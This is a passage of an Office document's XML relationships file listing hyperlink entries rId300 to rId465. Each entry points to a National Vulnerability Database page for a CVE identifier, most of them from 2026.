Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100507" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100510" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102109" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102376" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102385" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102391" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102395" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102396" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102398" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102456" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102457" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103242" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27371" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47554" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47602" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78210" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92869" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93512" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93514" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93770" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94078" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94081" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94171" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94499" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96351" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96352" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96814" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96816" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96819" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96820" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96830" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96836" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97065" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97077" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97235" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97237" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97250" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97253" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97271" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97272" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97289" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97290" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102127" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47582" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47596" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47598" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93495" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100275" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92868" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92873" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93462" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96342" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10726" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96824" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97242" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102141" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47509" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47515" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47522" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47524" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47525" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47527" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47529" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47532" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47533" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47537" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47538" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47539" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47542" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47543" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47544" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47546" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47547" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102133" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102135" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102145" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100274" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100279" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100513" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101879" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101881" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102124" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102139" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102146" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102375" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102386" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102397" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102588" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102991" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103001" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103538" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103592" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16596" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62078" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62079" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62080" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62084" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67075" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91109" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93995" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93996" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94029" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94074" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94077" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94674" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96338" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96347" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96829" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96834" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96835" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97067" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97236" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97239" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97247" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97262" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97265" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97266" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97270" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97279" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97286" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97288" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97292" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97298" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97301" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-14564" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11895" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14876" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47565" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47586" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6170" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6171" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6172" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6173" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88037" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92712" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93908" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102136" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102983" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103115" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103222" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103226" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103227" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103534" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103540" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103541" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103543" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91860" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96821" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103388" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103389" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47096" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47518" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100267" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100276" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102110" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102384" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55174" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76147" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94681" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103243" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103397" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102578" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103230" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103232" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103531" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103641" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 